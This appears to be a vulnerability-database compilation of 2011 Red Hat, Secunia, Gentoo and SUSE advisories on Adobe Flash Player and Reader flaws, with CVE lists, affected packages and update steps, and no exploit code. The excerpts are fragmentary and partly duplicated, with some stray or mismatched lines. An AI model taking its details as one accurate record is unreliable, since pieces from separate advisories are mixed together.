740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
VAR-201109-0139 | CVE-2011-2427 | Adobe Flash Player Vulnerable to stack-based buffer overflow |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in the ActionScript Virtual Machine (AVM) component in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to execute arbitrary code or cause a denial of service via unspecified vectors. Adobe Flash Player is prone to a remote stack-based buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
Adobe Flash Player Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA46113
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46113/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46113
RELEASE DATE:
2011-09-22
DISCUSS ADVISORY:
http://secunia.com/advisories/46113/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46113/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46113
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Flash Player,
which can be exploited by malicious people to conduct cross-site
scripting attacks, bypass certain security restrictions, and
compromise a user's system.
1) Certain unspecified input is not properly sanitised before being
returned to the user.
NOTE: This vulnerability is reportedly being actively exploited in
targeted attacks.
4) A logic error can be exploited to corrupt memory.
5) An unspecified error can be exploited to bypass the security
control and e.g. disclose certain sensitive information.
6) A logic error when streaming certain media can be exploited to
corrupt memory.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
1) Reported as a 0-day. The vendor additionally credits Google.
2) Bing Liu, Fortinet's FortiGuard Labs.
The vendor credits:
3) Yang Dingning, NCNIPC, Graduate University of Chinese Academy of
Sciences.
5) Neil Bergman, Cigital.
6) Zrong, zengrong.net.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb11-26.html
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-32.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
For more information:
SA44558
SA44574
SA44846
SA44964
SA45232
SA45583
SA45583
SA45621
SA45748
SA45978
SA46113
SA46512
SA46887
SA47001
SA47012
SA47611
The vulnerabilities are reported in versions 73.C0.41 and 73.B3.61. Please see the vendor's advisory for more details.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2130, CVE-2011-2134, CVE-2011-2135,
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138, CVE-2011-2139, CVE-2011-2140,
CVE-2011-2414, CVE-2011-2415, CVE-2011-2416, CVE-2011-2417, CVE-2011-2424,
CVE-2011-2425, CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430)
A flaw in Adobe Flash Player could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
VAR-201108-0217 | CVE-2011-2425 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2140, and CVE-2011-2417. Adobe Flash Player and Adobe AIR Any code that could be executed or service disruption ( Memory corruption ) There is a vulnerability that becomes a condition. This vulnerability CVE-2011-2135 , CVE-2011-2140 ,and CVE-2011-2417 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SUSE Security Announcement
Package: flash-player
Announcement ID: SUSE-SA:2011:033
Date: Wed, 10 Aug 2011 14:00:00 +0000
Affected Products: SUSE Linux Enterprise Desktop 11 SP1
SUSE Linux Enterprise Desktop 10 SP4
Vulnerability Type: remote code execution
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
SUSE Default Package: yes
Cross-References: CVE-2011-2130, CVE-2011-2134, CVE-2011-2135
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138
CVE-2011-2139, CVE-2011-2140, CVE-2011-2414
CVE-2011-2415, CVE-2011-2416, CVE-2011-2417
CVE-2011-2425
Content of This Advisory:
1) Security Vulnerability Resolved:
remote code execution
Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information
______________________________________________________________________________
1) Problem Description and Brief Discussion
Flash-Player was updated to version 10.3.188.5 to fix various buffer
and integer overflows:
- CVE-2011-2130: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2134: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2135: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2136: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2137: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2138: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2139: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2140: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2414: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2415: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2416: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2417: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2425: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Earlier flash-player versions can be exploited to execute arbitrary code
remotely with the privileges of the attacked user.
For more details see:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
2) Solution or Work-Around
none
3) Special Instructions and Notes
Pleease restart your browser.
4) Package Location and Checksums
The preferred method for installing security updates is to use the YaST
"Online Update" module or the "zypper" commandline tool. The package and
patch management stack will detect which updates are required and
automatically perform the necessary steps to verify and install them.
Alternatively, download the update packages for your distribution manually
and verify their integrity by the methods listed in Section 6 of this
announcement. Then install the packages using the command
rpm -Fhv <file.rpm>
to apply the update, replacing <file.rpm> with the filename of the
downloaded RPM package.
Our maintenance customers are notified individually. The packages are
offered for installation from the maintenance web:
SUSE Linux Enterprise Desktop 10 SP4
http://download.novell.com/patch/finder/?keywords=7c71e4aec6afd72e6b40f8cf2817e900
SUSE Linux Enterprise Desktop 11 SP1
http://download.novell.com/patch/finder/?keywords=377e091a105e9d540a2a90f09cff0a10
______________________________________________________________________________
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
______________________________________________________________________________
6) Authenticity Verification and Additional Information
- Announcement authenticity verification:
SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.
To verify the signature of the announcement, save it as text into a file
and run the command
gpg --verify <file>
replacing <file> with the name of the file where you saved the
